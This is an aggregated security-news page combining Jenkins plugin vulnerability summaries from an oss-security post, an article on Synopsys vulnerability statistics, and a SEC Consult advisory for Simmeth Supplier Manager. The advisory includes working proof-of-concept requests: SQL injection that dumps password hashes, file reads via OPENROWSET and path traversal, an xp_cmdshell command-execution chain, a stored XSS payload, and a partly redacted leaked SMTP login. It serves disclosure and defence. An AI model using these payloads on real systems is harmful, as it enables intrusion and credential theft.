Jenkins BART Plugin 1.0.3 and earlier does not escape the parsed content of build logs before rendering it on the Jenkins UI, resulting in a stored cross-site scripting (XSS) vulnerability.

CVE-2022-45387: Jenkins Security Advisory 2022-11-15

A missing permission check in Jenkins XP-Dev Plugin 1.0 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to an attacker-specified repository.

CVE-2022-45389: Jenkins Security Advisory 2022-11-15

Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.143 and earlier globally and unconditionally disables SSL/TLS certificate and hostname validation for the entire Jenkins controller JVM.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 15 Nov 2022 18:40:52 +0100
From: Daniel Beck <ml@...kweb.net>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities in Jenkins plugins

Jenkins is an open source automation server which enables developers around
the world to reliably build, test, and deploy their software.

The following releases contain fixes for security vulnerabilities:

\* CloudBees Docker Hub/Registry Notification Plugin 2.6.2.1
\* JUnit Plugin 1160.vf1f01a\_a\_ea\_b\_7f
\* Naginator Plugin 1.18.2
\* NS-ND Integration Performance Publisher Plugin 4.8.0.146
\* Pipeline Utility Steps Plugin 2.13.1 and 2.13.2
\* Reverse Proxy Auth Plugin 1.7.4
\* Script Security Plugin 1190.v65867a\_a\_47126
\* Support Core Plugin 1206.1208.v9b\_7a\_1d48db\_0f

Additionally, we announce unresolved security issues in the following
plugins:

\* Associated Files Plugin
\* BART Plugin
\* CCCC Plugin
\* Cluster Statistics Plugin
\* Config Rotator Plugin
\* Delete log Plugin
\* JAPEX Plugin
\* loader.io Plugin
\* NS-ND Integration Performance Publisher Plugin
\* OSF Builder Suite :: XML Linter Plugin
\* SourceMonitor Plugin
\* Violations Plugin
\* XP-Dev Plugin

Summaries of the vulnerabilities are below. More details, severity, and
attribution can be found here:
https://www.jenkins.io/security/advisory/2022-11-15/

We provide advance notification for security updates on this mailing list:
https://groups.google.com/d/forum/jenkinsci-advisories

If you discover security vulnerabilities in Jenkins, please report them as
described here:
https://www.jenkins.io/security/#reporting-vulnerabilities

---

SECURITY-2564 / CVE-2022-45379
Script Security Plugin 1189.vb\_a\_b\_7c8fd5fde and earlier stores
whole-script approvals as the SHA-1 hash of the approved script. SHA-1 no
longer meets the security standards for producing a cryptographically
secure message digest.


SECURITY-2888 / CVE-2022-45380
JUnit Plugin 1159.v0b\_396e1e07dd and earlier converts HTTP(S) URLs in test
report output to clickable links.

This is done in an unsafe manner, resulting in a stored cross-site
scripting (XSS) vulnerability exploitable by attackers with Item/Configure
permission.


SECURITY-2948 / CVE-2022-33980
Pipeline Utility Steps Plugin implements a \`readProperties\` Pipeline step
that supports interpolation of variables using the Apache Commons
Configuration library.

Pipeline Utility Steps Plugin 2.13.0 and earlier does not restrict the set
of enabled prefix interpolators and bundles versions of this library with
the vulnerability CVE-2022-33980.

This vulnerability allows attackers able to configure Pipelines to execute
arbitrary code in the context of the Jenkins controller JVM.


SECURITY-2949 / CVE-2022-45381
Pipeline Utility Steps Plugin implements a \`readProperties\` Pipeline step
that supports interpolation of variables using the Apache Commons
Configuration library.

Pipeline Utility Steps Plugin 2.13.1 and earlier does not restrict the set
of enabled prefix interpolators and bundles versions of this library that
enable the \`file:\` prefix interpolator by default.

This allows attackers able to configure Pipelines to read arbitrary files
from the Jenkins controller file system.


SECURITY-2946 / CVE-2022-45382
Naginator Plugin 1.18.1 and earlier does not escape display names of source
builds in builds that were triggered via Retry action.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers able to edit build display names.


SECURITY-2804 / CVE-2022-45383
Support Core Plugin defines the permission Support/DownloadBundle that
allows users without Overall/Administer permission to create and download
support bundles containing a limited set of diagnostic information.

Support Core Plugin 1206.v14049fa\_b\_d860 and earlier does not correctly
perform permission checks in several HTTP endpoints.

This allows attackers with Support/DownloadBundle permission to download a
previously created support bundle containing information limited to users
with Overall/Administer permission.


SECURITY-2094 / CVE-2022-45384
Reverse Proxy Auth Plugin 1.7.3 and earlier stores the LDAP manager
password unencrypted in the global \`config.xml\` file on the Jenkins
controller as part of its configuration.

This password can be viewed by attackers with access to the Jenkins
controller file system.


SECURITY-2843 / CVE-2022-45385
CloudBees Docker Hub/Registry Notification Plugin provides several webhook
endpoints that can be used to trigger builds when Docker images used by a
job have been rebuilt.

In CloudBees Docker Hub/Registry Notification Plugin 2.6.2 and earlier,
these endpoints can be accessed without authentication.

This allows unauthenticated attackers to trigger builds of jobs
corresponding to the attacker-specified repository.


SECURITY-766 / CVE-2022-45386
Violations Plugin 0.7.11 and earlier does not configure its XML parser to
prevent XML external entity (XXE) attacks.

This allows attackers to to control XML input files for the 'Report
Violations' post-build step to have agent processes parse a crafted file
that uses external entities for extraction of secrets from the Jenkins
agent or server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2802 / CVE-2022-45387
BART Plugin 1.0.3 and earlier does not escape the parsed content of build
logs before rendering it on the Jenkins UI.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.

As of publication of this advisory, there is no fix.


SECURITY-2842 / CVE-2022-45388
Config Rotator Plugin 2.0.1 and earlier does not restrict a file name query
parameter in an HTTP endpoint.

This allows unauthenticated attackers to read arbitrary files with \`.xml\`
extension on the Jenkins controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2853 / CVE-2022-45389
XP-Dev Plugin provides a webhook endpoint at \`/xpdev-webhook\` that can be
used to trigger builds configured to use a specified repository.

In XP-Dev Plugin 1.0 and earlier, this endpoint can be accessed without
authentication.

This allows unauthenticated attackers to trigger builds of jobs
corresponding to an attacker-specified repository.

As of publication of this advisory, there is no fix.


SECURITY-2857 / CVE-2022-45390
loader.io Plugin 1.0.1 and earlier does not perform a permission check in
an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials
IDs of credentials stored in Jenkins. Those can be used as part of an
attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2910 (1) / CVE-2022-45391
NS-ND Integration Performance Publisher Plugin 4.8.0.143 and earlier
globally and unconditionally disables SSL/TLS certificate and hostname
validation for the entire Jenkins controller JVM.


SECURITY-2910 (2) / CVE-2022-38666
NS-ND Integration Performance Publisher Plugin 4.8.0.146 and earlier
unconditionally disables SSL/TLS certificate and hostname validation for
several features.

As of publication of this advisory, there is no fix.


SECURITY-2912 / CVE-2022-45392
NS-ND Integration Performance Publisher Plugin 4.8.0.143 and earlier stores
passwords unencrypted in job \`config.xml\` files on the Jenkins controller
as part of its configuration.

These passwords can be viewed by attackers with Item/Extended Read
permission or access to the Jenkins controller file system.


SECURITY-2920 / CVE-2022-45393 (CSRF) & CVE-2022-45394 (missing permission check)
Delete log Plugin 1.0 and earlier does not perform a permission check in an
HTTP endpoint.

This allows attackers with Item/Read permission to delete build logs.

Additionally, this HTTP endpoint does not require POST requests, resulting
in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2921 / CVE-2022-45395
CCCC Plugin 0.6 and earlier does not configure its XML parser to prevent
XML external entity (XXE) attacks.

This allows attackers able to control the contents of the report file for
the 'Publish CCCC Report' post-build step to have agent processes parse a
crafted file that uses external entities for extraction of secrets from the
Jenkins agent or server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2927 / CVE-2022-45396
SourceMonitor Plugin 0.2 and earlier does not configure its XML parser to
prevent XML external entity (XXE) attacks.

This allows attackers able to control XML input files for the 'Publish
SourceMonitor results' post-build step to have agent processes parse a
crafted file that uses external entities for extraction of secrets from the
Jenkins agent or server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2937 / CVE-2022-45397
OSF Builder Suite :: XML Linter 1.0.2 and earlier does not configure its
XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control XML files that get processed by the
'OSF Builder Suite :: XML Linter' build step to have agent processes parse
a crafted file that uses external entities for extraction of secrets from
the Jenkins agent or server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2938 / CVE-2022-45398 (CSRF) & CVE-2022-45399 (missing permission check)
Cluster Statistics Plugin 0.4.6 and earlier does not perform a permission
check in an HTTP endpoint.

This allows attackers with Overall/Read permission to delete recorded
Jenkins Cluster Statistics.

Additionally, this HTTP endpoint does not require POST requests, resulting
in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2941 / CVE-2022-45400
JAPEX Plugin 1.7 and earlier does not configure its XML parser to prevent
XML external entity (XXE) attacks.

This allows attackers able to control XML input files for the 'Record Japex
test report' post-build step to have Jenkins parse a crafted file that uses
external entities for extraction of secrets from the Jenkins controller or
server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2947 / CVE-2022-45401
Associated Files Plugin 0.2.1 and earlier does not escape names of
associated files.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.

As of publication of this advisory, there is no fix.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-45391: security - Multiple vulnerabilities in Jenkins plugins

An incorrect permission check in Jenkins Support Core Plugin 1206.v14049fa_b_d860 and earlier allows attackers with Support/DownloadBundle permission to download a previously created support bundle containing information limited to users with Overall/Administer permission.

CVE-2022-45383: Jenkins Security Advisory 2022-11-15

Jenkins JUnit Plugin 1159.v0b_396e1e07dd and earlier converts HTTP(S) URLs in test report output to clickable links in an unsafe manner, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

CVE-2022-45380: Jenkins Security Advisory 2022-11-15

A missing permission check in Jenkins Delete log Plugin 1.0 and earlier allows attackers with Item/Read permission to delete build logs.

CVE-2022-45394: Jenkins Security Advisory 2022-11-15

Jenkins Config Rotator Plugin 2.0.1 and earlier does not restrict a file name query parameter in an HTTP endpoint, allowing unauthenticated attackers to read arbitrary files with '.xml' extension on the Jenkins controller file system.

CVE-2022-45388: Jenkins Security Advisory 2022-11-15

Jenkins OSF Builder Suite : : XML Linter Plugin 1.0.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVE-2022-45397: Jenkins Security Advisory 2022-11-15

Weak configurations for encryption and missing security headers topped the list of software issues found during a variety of penetration and application security tests.

Nearly every application has at least one vulnerability or misconfiguration that affects security and a quarter of application tests found a highly or critically severe vulnerability, a new study shows.

Weak SSL and TLS configuration, missing Content Security Policy (CSP) header, and information leakage through server banners topped the list of software issues with security implications, according to findings in software and hardware tools conglomerate Synopsys' new  Software Vulnerabilities Snapshot 2022 report published today. While many of the misconfigurations and vulnerabilities are considered to be of medium severity or less, at least 25% are rated highly or critically severe.

Configuration issues are often put in a less severe bucket, but both configuration and coding issues are equally risky, says Ray Kelly, a fellow with the Software Integrity Group at Synopsys.

"This really just points out that, \[while\] organizations may be doing a good job performing static scans to lower the number of coding vulnerabilities, they are not taking configuration into account, as it may be more difficult," he says. "Unfortunately, static application security testing (SAST) scans cannot perform configuration checks as \[they have\] no knowledge of the production environment where the code will be deployed."

The data argues for the benefits of using multiple tools to analyze software for vulnerabilities and misconfigurations. 

Penetration tests, for example, detected 77% of the weak SSL/TLS configuration issues, while dynamic application security testing (DAST) detected the issue in 81% of tests. Both the technologies, plus mobile application security testing (MAST), led to the issue being discovered in 82% of tests, according to the Synopsys report.

    

Most common application vulnerabilities. Source: Synopsys

Other application security firms have documented similar results. Over the past decade, for example, three times more applications are scanned, and each one is scanned 20 times more frequently, Veracode stated in its "State of Software Security" report in February. While that report found that 77% of third-party libraries still had not eliminated a disclosed vulnerability three months after the issue was reported, patched code was applied three times faster.

Software firms that use dynamic and static scanning in concert remediated half of flaws 24 days faster, Veracode stated.

"Continuous testing and integration, which includes security scanning in pipelines, is becoming the norm," the firm stated in a blog post at the time.

**Not Just SAST, Not Just DAST**

Synopsys released data from a variety of different tests with each having similar top offenders. Weak configurations of encryption technology — namely, Secure Sockets Layer (SSL) and Transport Layer Security (TLS) — topped the charts for static, dynamic, and mobile application security tests, for example.

Yet, the issues star to diverge further down the lists. Penetration tests identified weak password policies in a quarter of applications and cross-site scripting in 22%, while DAST identified applications lacking adequate session timeouts in 38% of tests and those vulnerable to clickjacking in 30% of tests.

Static and dynamic testing as well as software composition analysis (SCA) all have advantages and should be used together to have the highest chance to detect potential misconfigurations and vulnerabilities, says Synopsys's Kelly.

"Having said that, a holistic approach takes time, resources, and money, so this may not be feasible for many organizations," he says. "Taking the time to design security into the process can also help find and eliminate as many vulnerabilities as possible — whatever their type — along the way so that security is proactive and risk is reduced."

Overall the company collected data from nearly 4,400 tests on more than 2,700 programs. Cross-site scripting was the top high-risk vulnerability, accounting for 22% of the vulnerabilities discovered, while SQL injection was the most critical vulnerability category, accounting for 4%.

**Software Supply Chain Dangers**

With open-source software comprising nearly 80% of codebases, it's little surprise that 81% of codebases have at least one vulnerability and another 85% have an open-source component that is four years out of date.

Yet, Synopsys found that, despite those concerns, vulnerabilities in supply-chain security and open-source software components accounted for only about a quarter of issues. The Vulnerable Third-Party Libraries in Use category of security weaknesses was uncovered in 21% of the penetration tests and 27% of the static analysis tests, the report said.

Part of the reason for the lower-than-expected vulnerabilities in software components may be because software composition analysis (SCA) has become more widely used, says Kelly.

"These types of issues can be found in the early stages of the software development lifecycle (SDLC), such as the development and DevOps phases, which reduces the number that make it into production," he says.

Misconfigurations, Vulnerabilities Found in 95% of Applications

Simmeth System GmbH Supplier Manager (Lieferantenmanager) versions prior to 5.6 suffer from authentication bypass, code execution, cross site scripting, information leakage, remote SQL injection, and various other vulnerabilities.

    SEC Consult Vulnerability Lab Security Advisory < 20221109-0 >=======================================================================               title: Multiple Critical Vulnerabilities             product: Simmeth System GmbH Supplier manager (Lieferantenmanager)  vulnerable version: < 5.6       fixed version: 5.6          CVE number: CVE-2022-44012, CVE-2022-44013, CVE-2022-44014,                      CVE-2022-44015, CVE-2022-44016, CVE-2022-44017              impact: critical            homepage: https://www.simmeth.net               found: 2022-03-01                  by: Steffen Robertz (Office Vienna)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Atos company                      Europe | Asia | North America                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"We are an innovative B2B software provider for supply chain management,especially in the areas of supplier management over the entire supplierlifecycle and quality control, supply chain key figures and reporting.Our medium-sized family business is a reliable, practice-oriented partner withan extraordinary wealth of experience: since 2002, our currently more than 70medium-sized and corporate customers have trusted our solutions and ourpragmatically oriented expertise."Source: https://www.simmeth.net/en/company/about-usBusiness recommendation:------------------------The vendor provides a patch which should be installed immediately.An in-depth security analysis performed by security professionals ishighly advised, to identify and resolve potential further critical securityissues.  Vulnerability overview/description:-----------------------------------1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)An attacker can inject raw SQL queries. By activating MSSQL features, theattacker is able to execute arbitrary commands on the MSSQL server.2) Faulty API Design (CVE-2022-44014)A faulty API design allows an attacker to fetch arbitrary SQL tables perdesign. This will leak all user passwords and MSSQL hashes.3) Local File Access (CVE-2022-44016)An attacker can download arbitrary files from the web server by abusing an APIcall.4) Leak of Simmeth's SMTP passwordA cleartext password for the email account "LM@simmeth.net" is leaked duringthe login process.5) Stored Cross-Site Scripting (CVE-2022-44012)An attacker can execute JavaScript code in the browser of the victim if a siteis loaded. The victim's encrypted password can be stolen and most likely bedecrypted.6) Authentication Bypass (CVE-2022-44013)An attacker can access multiple API calls without authentication. Thus, alloutlined attacks can be executed without knowing any valid credentials.7) Errors in Session management (CVE-2022-44017)Due to errors in the session management, an attacker can log back into avictim's account after the victim logged out. This is due to the credentials notbeing cleaned from the local storage after logout.8) Information DisclosureMultiple requests were giving verbose error messages. This helps an attacker infinding and abusing a vulnerability.Proof of concept:-----------------1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)Following API call can be used to execute arbitrary SQL queries via a subqueryor stacked query in the table name. Because of vulnerability 6, only a validusername is required to send the request.---------------------------------POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1Content-Length: 1264[...]{   "Credential": {     "Mandant": {       "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",       "ConnectionString": {         "Available": false,         "System": "****"       },       "Encryption": 1,       "IsWithRegistration": true,       "Name": "****"     },     "Username": "simmeth",     "System": "****"   },   "ResultTab": {     "AutoLoad": false,     "Createable": true,     "Databases": [       {         "System": "****",         "Tables": [           {             "Columns": [],             "Name": "(SELECT name, password_hash FROM master.sys.sql_logins)sub;--",             "Relations": [],             "Results": [               {                 "ColumnName": "*"               }             ]           }         ]       }     ],     "Name": "Results",     "PageSize": 2000   },   "Ids": {},   "SecondaryIds": {},   "Constraints": [],   "DateConstraints": {},   "LogicOperator": 0,   "PageNumber": 0,   "Sortings": {},   "TableFilters": {},   "GroupByField": null,   "Aggregates": {},   "isExport": false}-------------------The POC above shows an example subquery, which will respond with the resultingdataset. Stacked queries will be executed, however, the results will not becontained in the web server's reply. The example query will dump the MSSQL passwordhashes.Further attacks include arbitrary file read with the following query:(SELECT * FROM OPENROWSET(BULK N'c:/windows/system32/license.rtf', SINGLE_CLOB) AS Contents)sub;--And code execution via the xp_cmdshell extended procedure:(SELECT @@Version AS version )sub; EXEC ('sp_configure ''show advanced options'', 1;RECONFIGURE;'); EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;');EXEC xp_cmdshell'nslookup some.domain';--2) Faulty API Design (CVE-2022-44014)The API design allows the frontend to supply an arbitrary table name(called <TABLE NAME HERE> in the POC below) into the following request.Because of vulnerability 6, only a valid username is required to send therequest.---------------------------------POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1Content-Length: 1264[...]{   "Credential": {     "Mandant": {       "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",       "ConnectionString": {         "Available": false,         "System": "****"       },       "Encryption": 1,       "IsWithRegistration": true,       "Name": "****"     },     "Username": "simmeth",     "System": "****"   },   "ResultTab": {     "AutoLoad": false,     "Createable": true,     "Databases": [       {         "System": "****",         "Tables": [           {             "Columns": [],             "Name": "<TABLE NAME HERE>",             "Relations": [],             "Results": [               {                 "ColumnName": "*"               }             ]           }         ]       }     ],     "Name": "Results",     "PageSize": 2000   },   "Ids": {},   "SecondaryIds": {},   "Constraints": [],   "DateConstraints": {},   "LogicOperator": 0,   "PageNumber": 0,   "Sortings": {},   "TableFilters": {},   "GroupByField": null,   "Aggregates": {},   "isExport": false}-------------------This is a fault by design, as the attacker has full control of the tablename. Therefore, an arbitrary table such as the user table(ACL_Benutzer_Admin_Einkauf and ACL_Benutzer) can be read.3) Local File Access (CVE-2022-44016)The "GetImages" API call can be abused to read arbitrary files from the filesystem. This is due to the API allowing to set the image path from thefrontend.By pointing the base path to C:\, all files can be accessed.Because of vulnerability 6, the request requires no credentials.-----------------------POST /DS/LM_API/api/ConfigurationService/GetImages HTTP/1.1Content-Length: 229[...]{"Credential":{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml"},},"ImagesPath":"C:\\","ListImageNames":[         "Windows\\win.ini",         "boot.ini",         "Windows\\system32\\eula.txt",         "Windows\\System32\\drivers\\etc\\hosts"]}--------------------The files are returned base64 encoded. Thus, even binary data can be extractedfrom the server.4) Leak of Simmeth's SMTP passwordThe following API call will return the current configuration. The configurationseems to contain cleartext credentials from Simmeth's SMTP server. Therequest does not require any credentials.-----------------POST /DS/LM_API/api/ConfigurationService/GetConfiguration HTTP/1.1Content-Length: 70Content-Type: application/json{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml",}}----------------The server responds with:---------------[...]"KPIIntro":{"IsAccessLog":true,"MailSettings":{"Host":"vwp4261.webpack.hosteurope.de","IsAuthentification":true,"IsSSL":false,"LoginName":"wp10481666-supply","Password":"K***********a","Port":"25","Sender":"LM@simmeth.net"[...]--------------Thus, an attacker could send phishing mails from an official Simmeth account.5) Stored Cross-Site Scripting (CVE-2022-44012)The following request can be used to store JavaScript code into the database. Itwill be fetched and executed in the victim's browser, once the site is visited.Because of vulnerability 6, only a valid username is required to send the request.--------------POST /DS/LM_API/api/SelectionService/InsertQueryWithActiveRelationsReturnId HTTP/1.1Content-Length: 3311{"Credential":{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml","ConnectionString":{"Available":false,"System":"****"},"Encryption":1,"IsWithRegistration":true,"Name":"****"},"Username":"********","System":"****"},"TabName":"Lieferzeiten","System":"****","TableName":"Lieferzeiten","Columns":{"Artikel":"test","Lieferzeit":"test1","Bemerkung":"<img src=xonerror=alert(document.domain)>test","Lie_ID":4167},[...]---------------The XSS can be used to steal the encrypted passwords from the local storage.As the API uses cleartext passwords with every request, it is most likelypossible to exfiltrate the passwords in cleartext as well.6) Authentication Bypass (CVE-2022-44013)All API calls start by supplying the Credential Object.----------------"Credential": {     "Mandant": {       "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml",       "ConnectionString": {         "Available": false,         "System": "****"       },       "Encryption": 1,       "IsWithRegistration": true,       "Name": "****"     },     "Username": "simmeth",     "Password: "*********"     "System": "****"   },----------------However, the password can just be removed. It seems to be only checked on thelogin API call. Thus, all requests can be made with just a username. The testedenvironment contained a User called "simmeth".Most likely this is a default user and thus always available, lowering therequirements for authenticated requests even further.7) Errors in Session management (CVE-2022-44017)An attacker can abuse a session management vulnerability in order to log backinto a user account after the user logged out.The encrypted password and username saved in the local storage of theweb browser is not cleared on logout and always stays valid. Hence, only the stateof the frontend state changes and the user appears to be logged out.An attacker can force the frontend state back into the logged in state byvisiting: https://<your-host>/LMS/LM/#main8) Information DisclosureThe application replies with verbose error messages, when triggeringexceptions. This can help an attacker to gain knowledge about the backend andaid in the development of exploits.Entering e.g. a single apostrophe into the table name of vulnerability 2 willcause the web server to print a full stack trace as well as the rest of the SQLquery. Hence, the SQL statement can easily be updated to execute properly.Vulnerable / tested versions:-----------------------------The test was conducted in version 5.4 which was found to be vulnerable.Vendor contact timeline:------------------------2022-04-01: Contacting vendor through info@simmeth.net2022-04-01: Simmeth requested to know in which customer's environment the             vulnerabilities were discovered.2022-04-04: SEC Consult's customer agreed to disclose their company name to Simmeth.2022-04-04: Simmeth claims that a new version has been deployed on 18.03.2022 and already             contains fixes. SEC Consult requests the version number of the fixed version.2022-04-06: Simmeth communicates the fixed version numbers, advisory is being sent per             unencrypted email.2022-04-07: Simmeth will verify if all vulnerabilities are already fixed.2022-04-20: Requested status. Vendor replies that our vulnerabilities are different/new             and currently being fixed.2022-04-25: Simmeth states that they will require two weeks to fix the vulnerabilities.             A new API will be created until the end of the year.2022-06-08: Simmeth sends changelog and states that all vulnerabilities have been fixed.2022-06-13: Asking regarding CVE numbers, Simmeth states that patching customers will take             until end of July.2022-09-02: Asking about CVE numbers and if all customers are patched.2022-09-05: Some customers are not yet patched. Current version is phased out by the             end of september. All customers will have to upgrade until then. SEC Consult             will request CVE numbers.2022-10-05: Requested status update.2022-10-17: All customers are updated.2022-11-09: Coordinated release of security advisory.Solution:---------The vendor provides a patched version 5.6 which fixes the identifiedsecurity issues. Please approach your vendor support contact in order to receivethe patches.Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabSEC Consult, an Atos companyEurope | Asia | North AmericaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anAtos company. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: http://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF S. Robertz / @2022

Tag

#ssl